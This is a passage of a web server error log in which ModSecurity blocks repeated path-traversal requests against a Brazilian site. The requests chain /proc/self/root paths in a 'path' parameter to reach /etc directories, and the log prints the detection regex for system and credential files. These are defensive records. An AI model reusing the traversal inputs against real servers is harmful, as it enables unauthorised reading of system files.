"abqTaMdf6f5d65gmYZTCCwAAAtg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:58:46.748439 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:43846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTdgkwaGbbGflqUZD-BgAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:59:02.819977 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:51996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqThsdf6f5d65gmYZTCNQAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:59:18.566892 2026] [:error] [pid 30077:tid 140411557287680] [client 216.73.216.191:9850] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTlvu8EFLIOrSqIpvy0wAAAlY"]
[Wed Mar 18 08:59:23.347032 2026] [:error] [pid 17653:tid 140411574073088] [client 216.73.216.191:22506] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTmcdf6f5d65gmYZTCUgAAAtQ"]
[Wed Mar 18 08:59:26.143002 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:53055] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTnuoXxyEfFpUF8f9cBAAAAUI"]
[Wed Mar 18 08:59:40.851928 2026] [:error] [pid 15826:tid 140411582465792] [client 216.73.216.191:9853] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTq-oXxyEfFpUF8f9cGwAAAVM"]
[Wed Mar 18 08:59:42.320681 2026] [:error] [pid 11816:tid 140411741927168] [client 216.73.216.191:2159] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTruw_le52K8_3pV3N1gAAAgA"]
[Wed Mar 18 08:59:46.874650 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:36944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTsta6ubjKNq_cu4aGjQAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:59:48.648926 2026] [:error] [pid 19507:tid 140411716749056] [client 216.73.216.191:22788] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTs9Y0UrI5A3LftIyP2QAAAYM"]
[Wed Mar 18 08:59:58.237142 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.243.128:33316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTvimAPhZkrhU8w4la8QAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:59:58.605107 2026] [:error] [pid 15826:tid 140411649607424] [client 216.73.216.191:44733] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTvuoXxyEfFpUF8f9cNAAAAUs"]
[Wed Mar 18 09:00:00.779310 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:61353] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTwNa6ubjKNq_cu4aGmAAAA0U"]
[Wed Mar 18 09:00:07.811667 2026] [:error] [pid 11816:tid 140411691570944] [client 216.73.216.191:5654] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTx-w_le52K8_3pV3N6gAAAgY"]
[Wed Mar 18 09:00:08.041790 2026] [mime_magic:error] [pid 29882:tid 140411733534464] (70014)End of file found: [client 216.73.216.191:65501] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:00:08.131544 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:38890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTyNY0UrI5A3LftIyP8gAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:00:08.815593 2026] [:error] [pid 30077:tid 140411716749056] [client 216.73.216.191:12259] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTyPu8EFLIOrSqIpvzAwAAAkM"]
[Wed Mar 18 09:00:13.438686 2026] [:error] [pid 15826:tid 140411725141760] [client 216.73.216.191:45491] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/x11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqTzeoXxyEfFpUF8f9cQgAAAUI"]
[Wed Mar 18 09:00:45.170964 2026] [:error] [pid 29882:tid 140411624429312] [client 216.73.216.191:25531] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqT7EzinOy1jxa1j4cCEwAAAQ4"]
[Wed Mar 18 09:00:48.110895 2026] [:error] [pid 17653:tid 140411649607424] [client 216.73.216.191:21339] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqT8Mdf6f5d65gmYZTCyQAAAss"]
[Wed Mar 18 09:00:48.327423 2026] [:error] [pid 26799:tid 140411708356352] [client 216.73.216.191:26486] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqT8Na6ubjKNq_cu4aGwQAAA0Q"]
[Wed Mar 18 09:00:52.511521 2026] [mime_magic:error] [pid 17887:tid 140411741927168] (70014)End of file found: [client 216.73.216.191:45247] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 09:00:52.873449 2026] [:error] [pid 19507:tid 140411716749056] [client 216.73.216.191:10143] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqT9NY0UrI5A3LftIyQFgAAAYM"]
[Wed Mar 18 09:00:53.650554 2026] [:error] [pid 26799:tid 140411632822016] [client 216.73.216.191:11329] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqT9da6ubjKNq_cu4aGygAAA00"]
[Wed Mar 18 09:01:04.473059 2026] [:error] [pid 11816:tid 140411683178240] [client 216.73.216.191:14980] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUAOw_le52K8_3pV3ODgAAAgc"]
[Wed Mar 18 09:01:08.348600 2026] [:error] [pid 15051:tid 140411616036608] [client 216.73.216.191:16967] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUAimAPhZkrhU8w4lbLAAAAI8"]
[Wed Mar 18 09:01:09.691064 2026] [:error] [pid 11816:tid 140411658000128] [client 216.73.216.191:11538] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUBew_le52K8_3pV3OFwAAAgo"]
[Wed Mar 18 09:01:17.262829 2026] [:error] [pid 11816:tid 140411590858496] [client 216.73.216.191:28946] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUDew_le52K8_3pV3OJgAAAhI"]
[Wed Mar 18 09:01:18.166448 2026] [:error] [pid 30077:tid 140411658000128] [client 216.73.216.191:50194] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUDvu8EFLIOrSqIpvzYgAAAko"]
[Wed Mar 18 09:01:37.872713 2026] [:error] [pid 31803:tid 140411574073088] [client 216.73.216.191:60464] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqUIeyqAr6etmhZHNqsRAAAAFQ"]
